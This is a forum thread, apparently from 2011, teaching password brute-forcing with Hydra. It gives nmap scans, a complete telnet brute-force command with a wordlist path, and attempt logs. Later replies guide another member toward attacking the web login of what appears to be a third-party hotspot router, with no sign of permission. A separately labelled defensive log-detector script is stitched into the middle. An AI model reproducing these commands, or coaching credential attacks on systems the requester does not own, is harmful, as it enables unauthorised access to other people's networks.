Indonesian Back|Track Team
Hydra how to- - Printable Version


Hydra how to- - iKONspirasi - 10-24-2011

After seeing the thread asking about hydra, I figured that rather than writing a long answer there, I'd just make a new thread :)
ok let's begin...

If we look at hydra's help, it shows what it can be used for:
Quote:
service the service to crack. Supported protocols: cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh svn teamspeak telnet vmauthd vnc xmpp

To use it, simply:
Code:
hydra -L "userlist" -P "wordlist" ip-target service PLAIN

meaning:
-L is used if we have a list of users that are likely in use (you can also go without -L, but then you must name the user, and it must be a lowercase l, for example --> -l admin)

-P is the wordlist we have; on BT5 the default is at /pentest/passwords/wordlists/darkc0de.lst

ip-target is filled in with our target; it can be a web server, router, switch, anything at all as long as it has an IP and a running service (and that service is among those hydra supports, of course)

service is as listed in hydra's help (better to run nmap -sV first)

PLAIN if the target does not use HTTPS (if it does, use -S to make an SSL connection)

for example...

first we do a port scan with nmap:

Code:
root@iKONs:~# nmap -sV 192.168.1.1

Quote:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-24 01:11 WIT
Nmap scan report for 192.168.1.1
Host is up (0.00078s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Netgear broadband router or ZyXel VoIP adapter ftpd 1.0
23/tcp open telnet Netgear broadband router or ZyXel VoIP adapter telnetd
80/tcp open http Allegro RomPager 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
MAC Address: D8:5D:4C:A1:9D:E7 (Tp-link Technologies Co.)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.30 seconds

from the data above we can see that port 23, a.k.a. the telnet service, is active...

then let's run hydra, assuming the username is admin and the service to brute force is telnet:

Code:
root@iKONs:~# hydra -V -l admin -P /pentest/passwords/wordlists/darkc0de.lst 192.168.1.1 telnet PLAIN

Quote:
Hydra v7.0 ©2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-24 01:11:50
WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 server, 1707656 login tries (l:1/p:1707656), ~106728 tries per task
[DATA] attacking service telnet on port 23
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "" - child 0 - 1 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 1 - 2 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 2 - 3 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 3 - 4 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 4 - 5 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 5 - 6 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 6 - 7 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 7 - 8 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " - child 8 - 9 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass " " - child 9 - 10 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "!magnus" - child 10 - 11 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "!power" - child 11 - 12 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass ""A" SIDES" - child 12 - 13 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass ""DETROIT" GARY & CC TH WIGGINS" - child 13 - 14 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "#" - child 14 - 15 of 1707656
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "#" - child 15 - 16 of 1707656
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

I didn't run the process above to completion, because it would certainly take a long time :P

btw the target here is my own modem, so please don't do anything to it, ok :P

hope this is useful
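
Seen from the defender's side, the run shown in the post above (16 parallel tasks cycling passwords for the single login `admin` against telnet) leaves a dense trail of failed logins from one source. The following is an added example, not part of the original post: a sliding-window detector over constructed log lines. The log format, the thresholds and the addresses 192.168.1.50 and 192.168.1.20 are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical log format (an assumption, not taken from any real telnetd):
#   <ISO timestamp> telnetd: login failed|ok user=<name> src=<ip>
LINE_RE = re.compile(r"^(?P<ts>\S+) telnetd: login (?P<result>failed|ok) "
                     r"user=(?P<user>\S+) src=(?P<src>\S+)$")

def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=30)):
    """One alert per source reaching `threshold` failed logins inside `window`."""
    recent = defaultdict(deque)      # src -> deque of (timestamp, user)
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["result"] != "failed":
            continue                 # skip unparseable lines and successes
        ts = datetime.fromisoformat(m["ts"])
        q = recent[m["src"]]
        q.append((ts, m["user"]))
        while q and ts - q[0][0] > window:   # drop events older than the window
            q.popleft()
        if len(q) >= threshold and m["src"] not in alerts:
            users = {u for _, u in q}
            alerts[m["src"]] = {
                "src": m["src"],
                "first_seen": q[0][0].isoformat(),
                "failures_in_window": len(q),
                # one login, many passwords: the `-l admin -P wordlist` shape
                "pattern": "single-user" if len(users) == 1 else "multi-user",
                "users": sorted(users),
            }
    return list(alerts.values())

def sample_log():
    """Constructed sample: 16 rapid failures for admin, plus one honest typo."""
    base = datetime(2011, 10, 24, 1, 11, 50)
    lines = [
        f"{(base + timedelta(milliseconds=200 * i)).isoformat()} "
        f"telnetd: login failed user=admin src=192.168.1.50"
        for i in range(16)
    ]
    lines.append("2011-10-24T01:12:05 telnetd: login failed user=operator src=192.168.1.20")
    lines.append("2011-10-24T01:12:09 telnetd: login ok user=operator src=192.168.1.20")
    return lines

if __name__ == "__main__":
    for alert in detect_bruteforce(sample_log()):
        print(alert)
```

The alert fires on the tenth failure, well before a wordlist of 1707656 entries is exhausted, which is the point at which a lockout or source block is still useful.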


RE: Hydra how to- - j3st3r - 10-24-2011

so here it works like a brute force, right bro..?
awesome.!! Brutal Attack :p


RE: Hydra how to- - iKONspirasi - 10-24-2011

yup, brutal, er, brute force attack :P


RE: Hydra how to- - cassaprodigy - 10-24-2011

wow, hydra is great, huh? cool bro, nice share


RE: Hydra how to- - betefive - 10-24-2011

so what if, say, bro.. the telnet port isn't open, what then?


RE: Hydra how to- - iKONspirasi - 10-24-2011

well, you look at -sV in nmap bro, then we see whether there's a service that can be exploited with hydra or not?


RE: Hydra how to- - betefive - 10-24-2011

(10-24-2011, 05:34 PM)konspirasi Wrote: well, you look at -sV in nmap bro, then we see whether there's a service that can be exploited with hydra or not?

already tried it, here's the report:

Code:
# nmap -sV 10.100.0.1

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-23 23:29 WIT
Nmap scan report for hotspot.zone.net (10.100.0.1)
Host is up (0.094s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE VERSION
53/tcp  open  domain  Mikrotik RouterOS named or OpenDNS Updater
80/tcp  open  http?
443/tcp open  https?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 00:15:6D:67:76:22 (Ubiquiti Networks)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.71 seconds




RE: Hydra how to- - iKONspirasi - 10-24-2011

port 53 is definitely not among hydra's services

ports 80 and 443 are possible, but only if a web application is running there; just try opening http://10.100.0.1 and then https://10.100.0.1 in a browser bro, is there a login page?

if there isn't, it probably can't be accessed from an IP outside its internal IPs, so it can't be exploited with hydra


RE: Hydra how to- - betefive - 10-24-2011

oh, I see bro...
http is there bro, but https isn't, so how do you exploit http bro?


RE: Hydra how to- - iKONspirasi - 10-24-2011

among the services there are http[s]-{head|get} and http[s]-{get|post}-form; there's a username and password form there, right? that means it uses the post method, and because it's only http we use:

Code:
http-post-form